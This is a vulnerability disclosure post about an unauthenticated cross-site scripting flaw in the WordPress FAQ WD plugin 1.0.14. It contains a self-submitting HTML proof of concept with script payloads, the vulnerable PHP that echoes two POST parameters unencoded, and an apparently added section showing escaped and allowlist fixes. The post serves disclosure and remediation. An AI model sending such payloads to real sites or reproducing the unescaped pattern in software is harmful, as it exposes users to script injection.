Date: Sat, 16 Apr 2016 14:01:20 +0530
From: shravan kumar <>
Subject: Unauthenticated XSS Vulnerability in WORDPRESS FAQ WD plugin 1.0.14.


I would like to report an unauthenticated XSS vulnerability in the FAQ WD
plugin, version 1.0.14.

The Plugin can be found at

This bug can be triggered by an unauthenticated or authenticated user. If a
user is sent a URL through social engineering and clicks the link, the bug
is triggered.

The URL should be something like this

The code for XSS_POC.html is as follows:

  <body onload="document.forms['xss'].submit()">
    <!-- the target URL was stripped from the archived post; action left empty -->
    <form name="xss" action="" method="POST">
      <input type="hidden" name="lang_err_mess" value="<script>alert(1);</script>" />
      <input type="hidden" name="lang_success_synchron" value="<script>alert(2);</script>" />
      <input type="submit" value="Submit form" />
    </form>
  </body>

Technical Details:

The vulnerable page is


This page can be directly accessed by anyone.

The code responsible for the vulnerability:

<?php if (isset($_POST['lang_err_mess'])): ?>
    <div class="error" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_err_mess']; ?></p></div>
<?php elseif (isset($_POST['lang_success'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php echo 'File was successfully updated.'; ?></p></div>
<?php endif; ?>
<?php if (isset($_POST['lang_success_synchron'])): ?>
    <div class="updated" style="display: inline-block;width: 100%"><p><?php echo $_POST['lang_success_synchron']; ?></p></div>
<?php endif; ?>

Here we can see that two POST parameters are echoed straight into the page
without any output encoding when it is rendered.

The vulnerable POST parameters are:

   - $_POST['lang_err_mess']
   - $_POST['lang_success_synchron']
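
For comparison, the unsafe pattern above beside two hardened forms of the same notice rendering. This is an added example, not code from the FAQ WD plugin; the notice keys and wording in the allowlist table are assumed, and htmlspecialchars() stands in for WordPress's esc_html() so the snippet runs outside WordPress.

```php
<?php
// Added example (not the plugin's code): the unsafe pattern from the
// advisory beside two safer ways to render the admin notice.
declare(strict_types=1);

// Vulnerable: request-controlled text is written straight into the page,
// so a payload such as the one in the PoC becomes live markup.
function render_notice_unsafe(string $text): string
{
    return '<div class="updated"><p>' . $text . '</p></div>';
}

// Minimal fix: HTML-encode before output. Inside a WordPress plugin the
// equivalent helper is esc_html(); htmlspecialchars() is used here so the
// example runs without WordPress loaded.
function render_notice_escaped(string $text): string
{
    $safe = htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="updated"><p>' . $safe . '</p></div>';
}

// Better fix: never reflect request text at all. The request carries only a
// status key, and the message shown is picked server-side from a fixed table.
// (Keys and wording below are assumed, not taken from the plugin.)
const NOTICE_MESSAGES = [
    'lang_success'          => 'File was successfully updated.',
    'lang_success_synchron' => 'Language files were synchronised.',
    'lang_err'              => 'The language file could not be saved.',
];

function render_notice_by_key(string $key): string
{
    if (!array_key_exists($key, NOTICE_MESSAGES)) {
        return ''; // unknown key: show nothing rather than echo the input
    }
    $safe = htmlspecialchars(NOTICE_MESSAGES[$key], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="updated"><p>' . $safe . '</p></div>';
}

// Constructed input: the same payload the advisory's PoC submits.
$payload = '<script>alert(1);</script>';
echo render_notice_unsafe($payload), "\n";   // script element reaches the browser intact
echo render_notice_escaped($payload), "\n";  // angle brackets and quotes are entity-encoded
echo render_notice_by_key($payload), "\n";   // empty string: payload is not an allowed key
```

The escaped variant is the one-line fix for each of the two echo sites shown above; the allowlist variant removes the reflection entirely and is the pattern to prefer when the notice text never needs to come from the request.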

Shravan Kumar
